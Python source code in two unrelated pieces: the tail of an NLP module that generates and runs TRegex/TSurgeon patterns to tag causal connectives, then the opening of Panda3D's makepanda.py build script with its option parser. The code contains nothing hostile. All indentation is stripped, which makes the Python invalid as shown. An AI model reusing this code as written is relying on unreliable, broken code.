# predicted_outputs has now been modified by the threads.
return predicted_outputs
#####################################
# Sentence preprocessing
#####################################
@staticmethod
def _preprocess_sentences(sentences):
logging.info("Preprocessing sentences...")
ptb_strings = []
for sentence in sentences:
sentence.possible_causations = []
if FLAGS.tregex_pattern_type == 'dependency':
ptb_strings.append(sentence.dep_to_ptb_tree_string() + '\n')
else:
ptb_strings.append(sentence.constituency_tree.pformat() + '\n')
if FLAGS.tregex_pattern_type == 'dependency':
# TODO: is it a problem that the acl passives also occasionally
# catch "by means of" expressions (e.g., "killed by strangulation")?
# TODO: Write a TSurgeon sequence to normalize verbal modifier
# passives with clausal causes? (e.g., "cancer, caused by smoking
# too much,..."). Requires handling acl -> advcl -> mark(by) rather
# than acl -> nmod -> case(by). Problematic because usually seems to
# occur in "by means of" cases.
# TODO: Edit to not transform "by means" or "by reason"?
# Order matters a lot here.
tsurgeon_script_names = [
'normalize_passives',
'normalize_acl_passives_1',
'normalize_acl_passives_2',
'normalize_acl_no_agent_1',
'normalize_acl_no_agent_2',
'normalize_acl_no_agent_3']
module_dir = path.dirname(path.realpath(__file__))
tsurgeon_script_names = [
path.join(module_dir, 'tsurgeon_dep', script_name) + '.ts'
for script_name in tsurgeon_script_names]
with tempfile.NamedTemporaryFile('w', prefix='trees',
delete=False) as tree_file:
encoded_strings = [s.encode('utf-8') for s in ptb_strings]
tree_file.writelines(encoded_strings)
tree_file.flush()
with tempfile.NamedTemporaryFile(
'w+b', prefix='tsurgeon', delete=False) as surgeried_file:
tsurgeon_command = (
([path.join(FLAGS.tregex_dir, 'tsurgeon.sh'), '-s',
'-treeFile', tree_file.name]
+ tsurgeon_script_names))
devnull = ( # To debug errors, change to stderr
TRegexConnectiveModel.TregexProcessorThread.dev_null)
retval = subprocess.call(
tsurgeon_command, stdout=surgeried_file, stderr=devnull)
if retval != 0:
raise RuntimeError("TSurgeon command failed: %s"
% tsurgeon_command)
surgeried_file.seek(0)
ptb_strings = surgeried_file.readlines()
else:
# Temporary measure until we get TSurgeon scripts updated for
# constituency parses: don't do any real preprocessing.
# TODO: Implement constituency scripts, and move TSurgeon-running
# code to be shared.
pass
logging.info('Done preprocessing.')
return ptb_strings
@staticmethod
def _filter_sentences_for_pattern(sentences, pattern, connective_lemmas):
possible_sentence_indices = []
for i, sentence in enumerate(sentences):
token_lemmas = [token.lemma for token in sentence.tokens]
# TODO: Should we filter here by whether there are enough tokens in
# the sentence to match the rest of the pattern, too?
if all([connective_lemma in token_lemmas
for connective_lemma in connective_lemmas]):
possible_sentence_indices.append(i)
return possible_sentence_indices
#####################################
# Pattern generation
#####################################
@staticmethod
def _get_dep_node_pattern(
sentence, node_index, node_names, connective_indices,
steiner_nodes, cause_head, effect_head):
def non_connective_pattern(node_name):
node_names[node_index] = node_name
return '/.*_[0-9]+/=%s' % node_name
'''
parent_sentence = token.parent_sentence
if parent_sentence.is_clause_head(token):
pos_pattern = '[<2 /^VB.*/ | < (__ <1 cop)]'
else:
pos_pattern = ('<2 /^%s.*/' % token.get_gen_pos())
return '/.*_[0-9+]/=%s %s' % (node_name, pos_pattern)
'''
token = sentence.tokens[node_index]
try:
connective_index = connective_indices.index(node_index)
node_name = 'connective_%d' % connective_index
node_names[node_index] = node_name
return ('/^%s_[0-9]+$/=%s <2 /^%s.*/' % (
token.lemma, node_name, token.get_gen_pos()))
except ValueError: # It's not a connective node
try:
steiner_index = steiner_nodes.index(node_index)
return non_connective_pattern('steiner_%d' % steiner_index)
except ValueError: # It's an argument node_index
node_name = ['cause', 'effect'][
token.index == effect_head.index]
return non_connective_pattern(node_name)
@staticmethod
def _get_dep_edge_pattern(edge_start, edge_end, sentence):
edge_label = sentence.edge_labels[(edge_start, edge_end)]
if edge_label in ['nsubj', 'csubj']:
options = ['<1 nsubj', '<1 csubj']
elif edge_label in ['nsubjpass', 'csubjpass']:
options = ['<1 nsubjpass', '<1 csubjpass']
else:
options = ['<1 ' + edge_label]
if edge_label != 'dep':
options.append('<1 dep')
return '[%s]' % ' | '.join(options)
@staticmethod
def _add_dep_edge_to_pattern(sentence, steiner_graph, pattern,
node_pattern, edge_start, edge_end,
node_names):
forward_weight = steiner_graph[edge_start, edge_end]
back_weight = steiner_graph[edge_end, edge_start]
independent_pattern = ''
if forward_weight > back_weight: # forward edge dominates
edge_pattern = TRegexConnectiveModel._get_dep_edge_pattern(
edge_start, edge_end, sentence)
pattern = '%s < (%s %s' % (pattern, node_pattern,
edge_pattern)
else: # back edge dominates
edge_pattern = TRegexConnectiveModel._get_dep_edge_pattern(
edge_end, edge_start, sentence)
# Paths with opposing arrows meeting at a single node mess up our
# scheme for edge patterns. (This happens particularly often with
# parse graphs that have been TSurgeoned.) Add these dependency
# labels as independent patterns, if necessary.
if pattern.endswith(']'):
pattern = '%s > (%s' % (pattern, node_pattern)
independent_pattern = ('~%s %s' %
(node_names[edge_end], edge_pattern))
else:
pattern = '%s %s > (%s' % (pattern, edge_pattern,
node_pattern)
return pattern, independent_pattern
@staticmethod
def _get_cons_node_pattern(sentence, node_index, node_names,
connective_nodes, steiner_nodes, cause_node,
effect_node):
tree = sentence.constituency_tree # for brevity
node = subtree_at_index(tree, node_index)
try:
connective_index = connective_nodes.index(node)
assert (isinstance(node[0][0], str)
or isinstance(node[0][0], unicode))
node_name = 'connective_%d' % connective_index
node_names[node_index] = node_name
gen_pos = Token.POS_GENERAL.get(node.label(), node.label())
return '(/^%s.*/=%s < %s)' % (gen_pos, node_name, node[0])
except ValueError: # It's not a connective node
try:
steiner_index = steiner_nodes.index(node_index)
node_name = 'steiner_%d' % steiner_index
pattern = '__=%s' % node_name
except ValueError: # It's an argument node_index
node_name = ['cause', 'effect'][node is effect_node]
pattern = '%s=%s' % (node.label(), node_name)
node_names[node_index] = node_name
return pattern
@staticmethod
def _add_cons_edge_to_pattern(sentence, steiner_graph, pattern,
node_pattern, edge_start, edge_end,
node_names):
# TODO: Make this use <+(VP) for VPs.
if steiner_graph[edge_start, edge_end]: # forward edge
pattern = '%s < (%s' % (pattern, node_pattern)
else: # back edge
pattern = '%s > (%s' % (pattern, node_pattern)
return pattern, ''
@staticmethod
def _generate_pattern_from_steiners(sentence, steiner_graph, steiner_nodes,
connective_nodes, cause, effect,
path_seed_index):
'''
Both dependency-based and constituency-based pattern generation share
the same algorithmic structure once the Steiner graph has been found.
The only difference is how patterns are generated for each node/edge.
If we're in dependency mode:
- `cause` and `effect` are the Tokens representing the argument heads.
- `connective_nodes` is a list of token indices.
If we're in constituency mode:
- `cause` and `effect` are constituency nodes spanning the argument
annotations.
- `connective_nodes` is a list of constituency tree nodes.
'''
if len(steiner_nodes) > FLAGS.tregex_max_steiners:
logging.debug(
"Ignoring very long pattern (sentence: %s)"
% sentence.original_text)
return (None, None)
pattern = ''
if FLAGS.tregex_pattern_type == 'dependency':
node_pattern_fn = TRegexConnectiveModel._get_dep_node_pattern
add_edge_fn = TRegexConnectiveModel._add_dep_edge_to_pattern
else:
node_pattern_fn = TRegexConnectiveModel._get_cons_node_pattern
add_edge_fn = TRegexConnectiveModel._add_cons_edge_to_pattern
# To generate the pattern, we start by generating one long string that
# can be checked easily by TRegex. That'll be the biggest chunk of the
# pattern. It consists of the longest path through the Steiner tree
# edges.
# Start the longest path search from a node we know is actually in the
# tree we're looking for.
longest_path = list(
longest_path_in_tree(steiner_graph, path_seed_index))
if FLAGS.tregex_pattern_type == 'dependency':
# Normalize the path so that we don't end up thinking the reverse
# path is a totally different pattern: always put the cause first.
try:
if (longest_path.index(cause.index) >
longest_path.index(effect.index)):
longest_path = longest_path[::-1]
except ValueError:
# TODO: Should we normalize in some other way if both args
# aren't in the longest path?
pass
# TODO: implement this for constituency?
node_names = {}
edges = [(None, longest_path[0])] + list(pairwise(longest_path))
independent_patterns = []
for edge_start, edge_end in edges:
end_node_pattern = node_pattern_fn(
sentence, edge_end, node_names, connective_nodes,
steiner_nodes, cause, effect)
if edge_start is not None:
pattern, independent_pattern = add_edge_fn(
sentence, steiner_graph, pattern, end_node_pattern,
edge_start, edge_end, node_names)
if independent_pattern:
independent_patterns.append(independent_pattern)
else: # start of path
pattern = '(%s' % end_node_pattern
pattern += ')' * len(edges)
# Next, we need to make sure all the edges that weren't included in the
# longest path get incorporated into the pattern. For this, it's OK to
# have a few colon-separated pattern segments (which slow TRegex down).
def get_named_node_pattern(node):
try:
return '=' + node_names[node]
except KeyError: # Node hasn't been named and given a pattern yet
return '(%s)' % node_pattern_fn(
sentence, node, node_names, connective_nodes,
steiner_nodes, cause, effect)
for edge_start, edge_end in zip(*steiner_graph.nonzero()):
if ((edge_start, edge_end) in edges
or (edge_end, edge_start) in edges):
continue
start_node_pattern = get_named_node_pattern(edge_start)
end_node_pattern = get_named_node_pattern(edge_end)
# Link end to start using add_edge_fn, as though start were the
# entire pattern so far. It will, in fact, be the entire pattern so
# far after the colon.
edge_pattern, independent_pattern = add_edge_fn(
sentence, steiner_graph, start_node_pattern, end_node_pattern,
edge_start, edge_end, node_names)
if independent_pattern:
independent_patterns.append(independent_pattern)
# The final paren is because the edge pattern functions don't close
# their parens.
pattern = '%s : (%s))' % (pattern, edge_pattern)
# Add fragments of pattern that couldn't be embedded in edge patterns.
for pattern_frag in independent_patterns:
logging.debug('Adding fragment %s to %s', pattern_frag, pattern)
pattern = '%s : (%s)' % (pattern, pattern_frag)
# All connective node IDs should be printed by TRegex.
node_names_to_print = [name for name in node_names.values()
if name.startswith('connective')]
if FLAGS.tregex_pattern_type == 'dependency':
# Fix cases where the head of an argument is already in the
# connective. The pattern generation will always prefer to name the
# node as a connective. Now, we generate a bit of additional pattern
# that specifies that the relevant argument head has the same name.
for arg, arg_name in [(cause, 'cause'), (effect, 'effect')]:
if arg.index in connective_nodes:
# Speed up search for arg node by requiring a POS/edge child
pattern = ('%s : (__=%s == =%s)'
% (pattern, arg_name, node_names[arg.index]))
# Prevent patterns from matching if cause and effect are identical.
# These are always spurious matches.
pattern += " : (=effect !== =cause)"
return pattern, node_names_to_print
@staticmethod
def _get_dependency_pattern(sentence, connective_tokens, cause_tokens,
effect_tokens):
connective_indices = [token.index for token in connective_tokens]
cause_head = sentence.get_head(cause_tokens)
effect_head = sentence.get_head(effect_tokens)
required_token_indices = list(set( # Eliminate potential duplicates
[cause_head.index, effect_head.index] + connective_indices))
# Once the sentence has been preprocessed, it is possible some nodes
# will have been deleted. We make sure to delete these from the list
# of required nodes. (We check whether each has an incoming or outgoing
# edge.)
# TODO: remember what nodes have been deleted, so that they can be
# re-added as part of the connective_tokens span if the pattern
# matches.
required_token_indices_to_keep = []
for required_index in required_token_indices:
if (sentence.edge_graph[:, required_index].nnz != 0
or sentence.edge_graph[required_index, :].nnz != 0):
required_token_indices_to_keep.append(required_index)
else:
logging.debug("Eliminating token %s from pattern"
% sentence.tokens[required_index])
required_token_indices = required_token_indices_to_keep
steiner_nodes, steiner_graph = steiner_tree(
sentence.edge_graph, required_token_indices,
sentence.path_costs, sentence.path_predecessors)
path_seed_index = connective_indices[0]
return TRegexConnectiveModel._generate_pattern_from_steiners(
sentence, steiner_graph, steiner_nodes, connective_indices,
cause_head, effect_head, path_seed_index)
@staticmethod
def _get_constituency_pattern(sentence, connective_tokens, cause_tokens,
effect_tokens):
# TODO: optimize shortest-path calculations on graph to be done only
# once? (currently happen repeatedly in steiner_tree)
constituency_tree = sentence.constituency_tree # for brevity
cause_node = sentence.get_constituency_node_for_tokens(cause_tokens)
effect_node = sentence.get_constituency_node_for_tokens(effect_tokens)
connective_treepositions = [
# Index includes ROOT token, so subtract 1.
constituency_tree.leaf_treeposition(t.index - 1)
for t in connective_tokens]
# Leaf treepositions get us to the words themselves. We want the nodes
# just above the words, so we lop off the ends of the positions.
connective_nodes = [constituency_tree[position[:-1]]
for position in connective_treepositions]
# Use IDs of terminal nodes so we can do quick checks for identity,
# rather than expensive recursive equality checks.
terminal_ids = [id(terminal) for terminal
in [cause_node, effect_node] + connective_nodes]
terminal_indices = [
i for (i, subtree) in enumerate(constituency_tree.subtrees())
if id(subtree) in terminal_ids]
steiner_nodes, steiner_graph = steiner_tree(
sentence.constituency_graph, terminal_indices, directed=False)
path_seed_index = index_of_subtree(connective_nodes[0])
return TRegexConnectiveModel._generate_pattern_from_steiners(
sentence, steiner_graph, steiner_nodes, connective_nodes,
cause_node, effect_node, path_seed_index)
@staticmethod
def _get_pattern(sentence, connective_tokens, cause_tokens, effect_tokens):
if FLAGS.tregex_pattern_type == 'dependency':
return TRegexConnectiveModel._get_dependency_pattern(
sentence, connective_tokens, cause_tokens, effect_tokens)
else:
return TRegexConnectiveModel._get_constituency_pattern(
sentence, connective_tokens, cause_tokens, effect_tokens)
def _extract_patterns(self, sentences):
# TODO: Extend this to work with cases of missing arguments.
self.tregex_patterns = []
patterns_seen = set()
preprocessed_ptb_strings = self._preprocess_sentences(sentences)
logging.info('Extracting patterns...')
if FLAGS.print_patterns:
print 'Patterns:'
for sentence, ptb_string in zip(sentences, preprocessed_ptb_strings):
if FLAGS.tregex_pattern_type == 'dependency':
sentence = sentence.substitute_dep_ptb_graph(ptb_string)
for instance in sentence.causation_instances:
if instance.cause != None and instance.effect is not None:
pattern, node_names = self._get_pattern(
sentence, instance.connective, instance.cause,
instance.effect)
if pattern is None:
continue
if pattern not in patterns_seen:
if FLAGS.print_patterns:
print ' ', pattern.encode('utf-8')
print ' Sentence:', (sentence.original_text.encode(
'utf-8'))
print
patterns_seen.add(pattern)
connective_lemmas = [t.lemma for t
in instance.connective]
self.tregex_patterns.append((pattern, node_names,
connective_lemmas))
sys.stdout.flush()
logging.info('Done extracting patterns.')
return preprocessed_ptb_strings
#####################################
# Running TRegex
#####################################
class TregexProcessorThread(threading.Thread):
def __init__(self, sentences, ptb_strings, queue, predicted_outputs,
*args, **kwargs):
super(TRegexConnectiveModel.TregexProcessorThread, self).__init__(
*args, **kwargs)
self.sentences = sentences
self.ptb_strings = ptb_strings
self.queue = queue
self.predicted_outputs = predicted_outputs
self.output_file = None
self.total_bytes_output = 0
# We associate a lock with the output file to prevent concurrency
# errors where progress reporting calls tell() at the same time as
# the main thread closes the file.
self.file_lock = Lock()
dev_null = open('/dev/null', 'w')
def run(self):
try:
while(True):
(pattern, connective_labels, possible_sentence_indices,
connective_lemmas) = self.queue.get_nowait()
if not possible_sentence_indices: # no sentences to scan
self.queue.task_done()
continue
possible_trees = [self.ptb_strings[i]
for i in possible_sentence_indices]
possible_sentences = [(i, self.sentences[i])
for i in possible_sentence_indices]
with tempfile.NamedTemporaryFile(
'w', prefix='trees') as tree_file:
# logging.debug("Trees written to %s (pattern: %s)"
# % (tree_file.name, pattern))
tree_file.writelines(possible_trees)
# Make sure the file is synced for threads to access
tree_file.flush()
self._process_pattern(
pattern, connective_labels, connective_lemmas,
possible_sentences, tree_file.name)
self.queue.task_done()
except Queue.Empty: # no more items in queue
return
_FIXED_TREGEX_ARGS = '-o -l -N -h cause -h effect'.split()
def _run_tregex(self, pattern, connective_labels, tree_file_path):
logging.debug("Processing %s to %s"
% (pattern, self.output_file.name))
if FLAGS.tregex_pattern_type == 'dependency':
output_type_arg = '-u'
else:
output_type_arg = '-x'
connective_printing_args = []
for connective_label in connective_labels:
connective_printing_args.extend(['-h', connective_label])
tregex_command = (
[path.join(FLAGS.tregex_dir, 'tregex.sh'), output_type_arg]
+ self._FIXED_TREGEX_ARGS + connective_printing_args
+ [pattern, tree_file_path])
devnull = TRegexConnectiveModel.TregexProcessorThread.dev_null
retcode = subprocess.call(tregex_command, stdout=self.output_file,
stderr=devnull) # Edit to debug problems
if retcode != 0:
raise RuntimeError("TRegex command failed: %s" % tregex_command)
_TREGEX_CACHE_DIR = home = path.expanduser("~/tregex_cache")
def _create_output_file_if_not_exists(self, pattern, connective_labels,
tree_file_path):
pattern_dir_name = pattern.replace('/', '\\')
if len(pattern_dir_name) > FLAGS.tregex_max_cache_filename_len:
# The combination of the start of the pattern plus the hash
# should be very hard indeed to accidentally match.
pattern_hash = hash(pattern_dir_name)
# Leave room for up to 20 characters of numerical hash (the max
# we could get on a 64-bit system).
pattern_dir_name = pattern_dir_name[:FLAGS.tregex_max_cache_filename_len - 20]
pattern_dir_name += str(pattern_hash)
file_hash = hash_file(tree_file_path)
cache_dir_name = path.join(self._TREGEX_CACHE_DIR, pattern_dir_name)
cache_file_name = path.join(cache_dir_name, file_hash)
try:
self.output_file = open(cache_file_name, 'rb')
except IOError: # No such file
try:
os.makedirs(cache_dir_name)
except OSError:
if not path.isdir(cache_dir_name):
raise
self.output_file = open(cache_file_name, 'w+b')
self._run_tregex(pattern, connective_labels, tree_file_path)
self.output_file.seek(0)
def _process_pattern(self, pattern, connective_labels,
connective_lemmas, possible_sentences,
tree_file_path):
self._create_output_file_if_not_exists(pattern, connective_labels,
tree_file_path)
with self.output_file:
for sentence_index, sentence in possible_sentences:
possible_causations = self._process_tregex_for_sentence(
pattern, connective_labels, connective_lemmas, sentence)
# NOTE: This is the ONLY PLACE where we modify shared data.
# It is thread-safe because self.predicted_outputs itself is
# never modified; its individual elements -- themselves
# lists -- are never replaced; and list.extend() is atomic.
self.predicted_outputs[sentence_index].extend(
possible_causations)
# Tell the progress reporter how far we've gotten, so that it
# will know progress for patterns that have already finished.
self.total_bytes_output += self.output_file.tell()
# Lock the file lock as we close the file
self.file_lock.acquire()
# Now release the lock once the file is closed
self.file_lock.release()
self.output_file = None
@staticmethod
def _get_constituency_token_from_tregex_line(line, sentence,
all_treepositions):
# We need to use treepositions, not subtrees, because this
# is how TRegex gives match positions.
treeposition_index = int(line.split(":")[1])
node = sentence.constituency_tree[
all_treepositions[treeposition_index - 1]]
head = sentence.constituent_heads[node]
return sentence.get_token_for_constituency_node(head)
@staticmethod
def _get_dependency_token_from_tregex_line(line, sentence):
token_index = int(line.split("_")[-1])
return sentence.tokens[token_index]
def _process_tregex_for_sentence(self, pattern, connective_labels,
connective_lemmas, sentence):
# Read TRegex output for the sentence.
# For each sentence, we leave the file positioned at the next
# tree number line.
self.output_file.readline() # skip tree num line
next_line = self.output_file.readline().strip()
lines = []
while next_line:
lines.append(next_line)
next_line = self.output_file.readline().strip()
true_connectives = {
tuple(instance.connective): instance
for instance in sentence.causation_instances
if instance.cause and instance.effect # limit to pairwise
}
# Parse TRegex output. Argument and connective identifiers will be
# printed in batches of 2 + k, where k is the connective length.
# The first two printed will be cause/effect; the remainder are
# connectives.
batch_size = 2 + len(connective_labels)
possible_causations = []
for match_lines in igroup(lines, batch_size):
# TODO: If the argument heads overlap, we can't match the
# pattern. This is extremely rare, but it's not clear how to
# deal with it when it does happen.
if None in match_lines:
logging.warn(
"Skipping invalid TRegex match: %s (pattern: %s)",
lines, pattern)
continue
arg_lines = match_lines[:2]
connective_lines = match_lines[2:]
if FLAGS.tregex_pattern_type == 'dependency':
cause, effect = [
self._get_dependency_token_from_tregex_line(line,
sentence)
for line in arg_lines]
connective = [
self._get_dependency_token_from_tregex_line(line,
sentence)
for line in connective_lines]
else: # constituency
all_treepositions = (sentence.constituency_tree
.treepositions())
cause, effect = [
self._get_constituency_token_from_tregex_line(
line, sentence, all_treepositions)
for line in arg_lines]
connective = [
self._get_constituency_token_from_tregex_line(
line, sentence, all_treepositions)
for line in connective_lines]
connective.sort( # Ensure connective order is always consistent
key=lambda token: connective_lemmas.index(token.lemma))
# TODO: Make this eliminate duplicate PossibleCausations on
# the same connective words, like regex pipeline does.
possible = PossibleCausation(
sentence, [pattern], connective,
true_connectives.get(tuple(connective), None),
[cause], [effect])
possible_causations.append(possible)
'''
# Debugging code to search for specific matches
if [t.lemma for t in connective] == ['help']:
print "Match:", possible
print "Sentence:", sentence.original_text.encode('utf8')
print "Pattern:", pattern
print
'''
return possible_causations
def get_progress(self):
try:
with self.file_lock:
progress = self.total_bytes_output + self.output_file.tell()
return progress
except (AttributeError, IOError, ValueError):
# AttributeError indicates that self.output_file was None.
# IOError/ValueError indicate that we managed to ask for file
# size just after the file was closed. Either way, that means
# that now the total number of bytes has been recorded.
return self.total_bytes_output
@staticmethod
def _make_progress_reporter(threads, total_estimated_bytes,
all_threads_done):
def report_progress_loop():
while(True):
time.sleep(4)
if all_threads_done[0]:
return
bytes_output = sum([t.get_progress() for t in threads])
# Never allow > 99% completion as long as we're still running.
# (This can happen if our estimated max sizes turn out to be
# off.)
try:
progress = min(
bytes_output / float(total_estimated_bytes), 0.99)
except ZeroDivisionError:
progress = 0
if not all_threads_done[0]: # Make sure we're still going
logging.info("Tagging connectives: %1.0f%% complete"
% (progress * 100))
else:
break
progress_reporter = threading.Thread(target=report_progress_loop)
progress_reporter.daemon = True
return progress_reporter
class TRegexConnectiveStage(Stage):
def __init__(self, name):
super(TRegexConnectiveStage, self).__init__(
name=name, model=TRegexConnectiveModel())
self.pairwise_only_metrics = None # used during evaluation
produced_attributes = ['possible_causations']
def _make_evaluator(self):
return PairwiseAndNonIAAEvaluator(False, False,
FLAGS.patterns_print_test_instances,
True, 'possible_causations', False)
# No need for _label_instance, as we take care of that in _test_documents.
def __deduplicate(self, sentence_pcs):
pc_tuples_to_pcs = {}
for pc in sentence_pcs:
pc_tuple = get_causation_tuple(pc.connective, pc.cause[0],
pc.effect[0])
previous_pc = pc_tuples_to_pcs.get(pc_tuple, None)
if previous_pc is None:
pc_tuples_to_pcs[pc_tuple] = pc
else:
# print "Duplicate found:", pc
previous_pc.matching_patterns.append(pc.matching_patterns[0])
sentence_pcs = pc_tuples_to_pcs.values()
sentence_pcs.sort(key=lambda pc: pc.connective[0].index)
return sentence_pcs
def _test_documents(self, documents, sentences_by_doc, writer):
all_sentences = list(itertools.chain(*sentences_by_doc))
all_possible_causations = self.model.test(all_sentences)
causations_iter = iter(all_possible_causations)
for document, doc_sentences in zip(documents, sentences_by_doc):
for sentence in doc_sentences:
sentence.possible_causations = self.__deduplicate(
causations_iter.next())
if writer:
writer.instance_complete(document, sentence)
try:
causations_iter.next()
assert False, "Should have as many causation lists as sentences!"
except StopIteration:
pass
|
makepanda.py
|
#!/usr/bin/env python
########################################################################
#
# To build panda using this script, type 'makepanda.py' on unix
# or 'makepanda.bat' on windows, and examine the help-text.
# Then run the script again with the appropriate options to compile
# panda3d.
#
########################################################################
try:
import sys, os, platform, time, stat, re, getopt, threading, signal, shutil
if sys.platform == "darwin" or sys.version_info >= (2, 6):
import plistlib
if sys.version_info >= (3, 0):
import queue
else:
import Queue as queue
except:
print("You are either using an incomplete or an old version of Python!")
print("Please install the development package of Python 2.x and try again.")
exit(1)
from makepandacore import *
from installpanda import *
import time
import os
import sys
########################################################################
##
## PARSING THE COMMAND LINE OPTIONS
##
## You might be tempted to change the defaults by editing them
## here. Don't do it. Instead, create a script that compiles
## panda with your preferred options. Or, create
## a 'makepandaPreferences' file and put it into your python path.
##
########################################################################
COMPILER=0
INSTALLER=0
WHEEL=0
RUNTESTS=0
GENMAN=0
COMPRESSOR="zlib"
THREADCOUNT=0
CFLAGS=""
CXXFLAGS=""
LDFLAGS=""
RTDIST=0
RTDIST_VERSION=None
RUNTIME=0
DISTRIBUTOR=""
VERSION=None
DEBVERSION=None
WHLVERSION=None
RPMRELEASE="1"
GIT_COMMIT=None
P3DSUFFIX=None
MAJOR_VERSION=None
COREAPI_VERSION=None
PLUGIN_VERSION=None
OSXTARGET=None
OSX_ARCHS=[]
HOST_URL=None
global STRDXSDKVERSION, BOOUSEINTELCOMPILER
STRDXSDKVERSION = 'default'
WINDOWS_SDK = None
MSVC_VERSION = None
BOOUSEINTELCOMPILER = False
OPENCV_VER_23 = False
if "MACOSX_DEPLOYMENT_TARGET" in os.environ:
OSXTARGET=os.environ["MACOSX_DEPLOYMENT_TARGET"]
PkgListSet(["PYTHON", "DIRECT", # Python support
"GL", "GLES", "GLES2"] + DXVERSIONS + ["TINYDISPLAY", "NVIDIACG", # 3D graphics
"EGL", # OpenGL (ES) integration
"EIGEN", # Linear algebra acceleration
"OPENAL", "FMODEX", # Audio playback
"VORBIS", "OPUS", "FFMPEG", "SWSCALE", "SWRESAMPLE", # Audio decoding
"ODE", "PHYSX", "BULLET", "PANDAPHYSICS", # Physics
"SPEEDTREE", # SpeedTree
"ZLIB", "PNG", "JPEG", "TIFF", "OPENEXR", "SQUISH", # 2D Formats support
] + MAYAVERSIONS + MAXVERSIONS + [ "FCOLLADA", "ASSIMP", "EGG", # 3D Formats support
"FREETYPE", "HARFBUZZ", # Text rendering
"VRPN", "OPENSSL", # Transport
"FFTW", # Algorithm helpers
"ARTOOLKIT", "OPENCV", "DIRECTCAM", "VISION", # Augmented Reality
"GTK2", # GTK2 is used for PStats on Unix
"MFC", "WX", "FLTK", # Used for web plug-in only
"ROCKET", "AWESOMIUM", # GUI libraries
"CARBON", "COCOA", # Mac OS X toolkits
"X11", # Unix platform support
"PANDATOOL", "PVIEW", "DEPLOYTOOLS", # Toolchain
"SKEL", # Example SKEL project
"PANDAFX", # Some distortion special lenses
"PANDAPARTICLESYSTEM", # Built in particle system
"CONTRIB", # Experimental
"SSE2", "NEON", # Compiler features
])
CheckPandaSourceTree()
def keyboardInterruptHandler(x,y):
exit("keyboard interrupt")
signal.signal(signal.SIGINT, keyboardInterruptHandler)
########################################################################
##
## Command-line parser.
##
## You can type "makepanda --help" to see all the options.
##
########################################################################
def usage(problem):
if (problem):
print("")
print("Error parsing command-line input: %s" % (problem))
print("")
print("Makepanda generates a 'built' subdirectory containing a")
print("compiled copy of Panda3D. Command-line arguments are:")
print("")
print(" --help (print the help message you're reading now)")
print(" --verbose (print out more information)")
print(" --runtime (build a runtime build instead of an SDK build)")
print(" --tests (run the test suite)")
print(" --installer (build an installer)")
print(" --wheel (build a pip-installable .whl)")
print(" --optimize X (optimization level can be 1,2,3,4)")
print(" --version X (set the panda version number)")
print(" --lzma (use lzma compression when building Windows installer)")
print(" --distributor X (short string identifying the distributor of the build)")
print(" --outputdir X (use the specified directory instead of 'built')")
print(" --host URL (set the host url (runtime build only))")
print(" --threads N (use the multithreaded build system. see manual)")
print(" --osxtarget N (the OS X version number to build for (OS X only))")
print(" --universal (build universal binaries (OS X only))")
print(" --override \"O=V\" (override dtool_config/prc option value)")
print(" --static (builds libraries for static linking)")
print(" --target X (experimental cross-compilation (android only))")
print(" --arch X (target architecture for cross-compilation)")
print("")
for pkg in PkgListGet():
p = pkg.lower()
print(" --use-%-9s --no-%-9s (enable/disable use of %s)"%(p, p, pkg))
if sys.platform != 'win32':
print(" --<PKG>-incdir (custom location for header files of thirdparty package)")
print(" --<PKG>-libdir (custom location for library files of thirdparty package)")
print("")
print(" --nothing (disable every third-party lib)")
print(" --everything (enable every third-party lib)")
print(" --directx-sdk=X (specify version of DirectX SDK to use: jun2010, aug2009, mar2009, aug2006)")
print(" --windows-sdk=X (specify Windows SDK version, eg. 7.0, 7.1 or 10. Default is 7.1)")
print(" --msvc-version=X (specify Visual C++ version, eg. 10, 11, 12, 14. Default is 14)")
print(" --use-icl (experimental setting to use an intel compiler instead of MSVC on Windows)")
print("")
print("The simplest way to compile panda is to just type:")
print("")
print(" makepanda --everything")
print("")
os._exit(1)
def parseopts(args):
global INSTALLER,WHEEL,RUNTESTS,RTDIST,RUNTIME,GENMAN,DISTRIBUTOR,VERSION
global COMPRESSOR,THREADCOUNT,OSXTARGET,OSX_ARCHS,HOST_URL
global DEBVERSION,WHLVERSION,RPMRELEASE,GIT_COMMIT,P3DSUFFIX,RTDIST_VERSION
global STRDXSDKVERSION, WINDOWS_SDK, MSVC_VERSION, BOOUSEINTELCOMPILER
longopts = [
"help","distributor=","verbose","runtime","osxtarget=","tests",
"optimize=","everything","nothing","installer","wheel","rtdist","nocolor",
"version=","lzma","no-python","threads=","outputdir=","override=",
"static","host=","debversion=","rpmrelease=","p3dsuffix=","rtdist-version=",
"directx-sdk=", "windows-sdk=", "msvc-version=", "clean", "use-icl",
"universal", "target=", "arch=", "git-commit=", "no-directscripts",
"use-touchinput", "no-touchinput"]
anything = 0
optimize = ""
target = None
target_arch = None
universal = False
clean_build = False
for pkg in PkgListGet():
longopts.append("use-" + pkg.lower())
longopts.append("no-" + pkg.lower())
longopts.append(pkg.lower() + "-incdir=")
longopts.append(pkg.lower() + "-libdir=")
try:
opts, extras = getopt.getopt(args, "", longopts)
for option, value in opts:
if (option=="--help"): raise Exception
elif (option=="--optimize"): optimize=value
elif (option=="--installer"): INSTALLER=1
elif (option=="--tests"): RUNTESTS=1
elif (option=="--wheel"): WHEEL=1
elif (option=="--verbose"): SetVerbose(True)
elif (option=="--distributor"): DISTRIBUTOR=value
elif (option=="--rtdist"): RTDIST=1
elif (option=="--runtime"): RUNTIME=1
elif (option=="--genman"): GENMAN=1
elif (option=="--everything"): PkgEnableAll()
elif (option=="--nothing"): PkgDisableAll()
elif (option=="--threads"): THREADCOUNT=int(value)
elif (option=="--outputdir"): SetOutputDir(value.strip())
elif (option=="--osxtarget"): OSXTARGET=value.strip()
elif (option=="--universal"): universal = True
elif (option=="--target"): target = value.strip()
elif (option=="--arch"): target_arch = value.strip()
elif (option=="--nocolor"): DisableColors()
elif (option=="--version"):
match = re.match(r'^\d+\.\d+\.\d+', value)
if not match:
usage("version requires three digits")
WHLVERSION = value
VERSION = match.group()
elif (option=="--lzma"): COMPRESSOR="lzma"
elif (option=="--override"): AddOverride(value.strip())
elif (option=="--static"): SetLinkAllStatic(True)
elif (option=="--host"): HOST_URL=value
elif (option=="--debversion"): DEBVERSION=value
elif (option=="--rpmrelease"): RPMRELEASE=value
elif (option=="--git-commit"): GIT_COMMIT=value
elif (option=="--p3dsuffix"): P3DSUFFIX=value
elif (option=="--rtdist-version"): RTDIST_VERSION=value
# Backward compatibility, OPENGL was renamed to GL
elif (option=="--use-opengl"): PkgEnable("GL")
